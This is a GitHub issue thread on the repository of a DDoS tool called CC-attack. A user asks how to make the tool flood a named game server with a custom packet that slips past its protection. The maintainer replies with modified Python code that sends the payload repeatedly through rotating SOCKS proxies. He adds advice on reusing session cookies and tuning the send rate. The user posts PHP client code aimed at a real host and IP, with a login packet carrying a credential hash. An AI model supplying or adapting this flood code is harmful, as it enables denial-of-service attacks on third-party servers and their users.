### ISSUE TITLE
Hello

### ISSUE THREAD

**Issue by Timezero1** [Leeon123/CC-attack#65]
hello, I have such a question, I need to send a packet to the target site with the request (LIST l = "qwerty" /) is it possible to insert it into the CC attack somewhere? or as I understand this request should be passed to all proxies, and they are on target, then how to implement this?

**Comment by Timezero1** [comment]
<LIST l = "qwerty" />

**Comment by Leeon123** [comment]
What do u mean  "(LIST l = "qwerty" /)" ?

**Comment by Timezero1** [comment]
I need proxies to send a packet <LIST l = "qwerty" /> to the attacked esrver, to bypass the protection, this packet asks for a list of servers after the autofication is in progress, it turns out that the protection passes the packet <LIST l = "qwerty" /> in any amount, protection costs sturmwall, a server with a constant port accepts packets, can a cc attack send the requests I need?

**Comment by Timezero1** [comment]
{ <LIST l = "qwerty" /> }

**Comment by Timezero1** [comment]
> Что вы имеете в виду "(СПИСОК l =" qwerty "/)"?

this is the package itself that needs to be sent

**Comment by Leeon123** [comment]
If LIST l = "qwerty"  is the whole thing u want to send, u can just remove the http - request and turn it to your request.
As a example,
```
def cc(event,socks_type,ind_rlock):
	global ind_dict
	Payload = 'LIST l = "qwerty"'
	proxy = Choice(proxies).strip().split(":")
	event.wait()
	while True:
		try:
			s = socks.socksocket()
			if socks_type == 4:
				s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1]))
			if socks_type == 5:
				s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1]))
			if brute:
				s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
			s.connect((str(target), int(port)))
			if protocol == "https":
				ctx = ssl.SSLContext()
				s = ctx.wrap_socket(s,server_hostname=target)
			try:
				for n in range(multiple+1):
					sent = s.send(str.encode(Payload))
					if not sent:
						ind_rlock.acquire()
						ind_dict[(proxy[0]+":"+proxy[1]).strip()] += n
						ind_rlock.release()
						proxy = Choice(proxies).strip().split(":")
						break
				s.close()
			except:
				s.close()
			ind_rlock.acquire()
			ind_dict[(proxy[0]+":"+proxy[1]).strip()] += multiple+1
			ind_rlock.release()
		except:
			s.close()```

**Comment by Timezero1** [comment]
Thank you so much for your answer !!!!

**Comment by Timezero1** [comment]
Sorry for the importunity, but for post and head requests, what option, if it's not difficult for you to write, I will be very grateful!

**Comment by Timezero1** [comment]
good afternoon, on call? or is it not possible about what I asked?

**Comment by Leeon123** [comment]
I am not online often. It is not difficult but why, the part of code I wrote for you upstairs is only sending the message of 'LIST l = "qwerty"', and there is no http header in the code, as a result, you don't need other mode.

**Comment by Timezero1** [comment]
and if there is an http request? you can use an example for http, I will be very grateful

**Comment by Timezero1** [comment]
this code that I gave is a package for requesting an authorization form, there is a batch data transfer

**Comment by Timezero1** [comment]
I am implementing an attack on applications, only this package goes through without authorization, it seems to me it will be more difficult to implement authorization through cc attack, I go the way that is easier

**Comment by Leeon123** [comment]
what do u mean a example for http? If u only need to send that packet to the target, the code I gave u that is it. And no need for other mode.
However, if u really want a http request after authorization, the common way is using cookies. Try to find out if there is any new cookies after authorization, if yes, you can try to use it in the cookies option when using the unedited cc.py.

**Comment by Timezero1** [comment]
Thank you so much for your answer and help.

**Comment by Timezero1** [comment]
((-php

ini_set("max_execution_time", "10");
set_time_limit(10);

$ser = 1;
ConnectKlient();
Connectchat();
socket_set_blocking($klient, false);
socket_set_blocking($chat, false);

Function ConnectKlient()
{
   global $b, $last, $buf, $klient, $ser, $i, $s, $ss, $ses, $chat;
   $klient = fsockopen("city1.funzero.ru", 5190, $errno, $errstr, 5);

   socket_set_blocking($klient, false);
      //    fclose($klient);
     sleep(1);

  $buf = fgets($klient);
    echo "$buf";
     sleep(1);
fputs($klient, "");
   fputs($klient, "<LOGIN v3=\"192.168.1.122\" lang=\"ru\" v2=\"7.0.1 (7.1.2.6)\" v=\"108\" p=\"AE6630F05E5D96C608BAA7CFF26945AA2E6C4CE2\" l=\"lalka\" />\r\n\r\n");
    socket_set_blocking($klient, false);
         
  // <LOGIN v3="192.168.1.122" lang="ru" v2="7.0.1 (7.1.2.6)" v="108" p="AE6630F05E5D96C608BAA7CFF26945AA2E6C4CE2" l="lalka" />
   
  $i = 0;
   
   $s = '   ';
   $b = 0;
   $ses = '';
   $buf = '';
   $ss = '';
   sleep(1);
 
   return $klient;
   if(strpos($buf, 'ERROR') === true)
   {
      die('1ERROR');
   }
    if($buf == '')
   {
      die('2ERROR');
   }
   $ses = substr($buf, strpos($buf, 'ses="') + 5);
   $ses = substr($ses, 0, strpos($ses, '"'));
   fputs($klient, "<GETME />\r\n\r\n");
   fputs($klient, "<CHAT />\r\n\r\n");
   
}

Function Connectchat()
{
   global $ses, $chat, $login;
   $chat = fsockopen("62.171.179.101", 5190);
   socket_set_blocking($chat, false);
   fputs($chat, "<CHAT ses=\"${ses}\" l=\"${login}\" />\r\n\r\n");
   
}
die();

?>-))))

**Comment by Timezero1** [comment]
only without parentheses, so something doesn't save the code

**Comment by Leeon123** [comment]
hmm, what do u mean 1 stream? 
Slowing the request of sending can add something like "time.sleep(0.1)" to slow down the sending rate
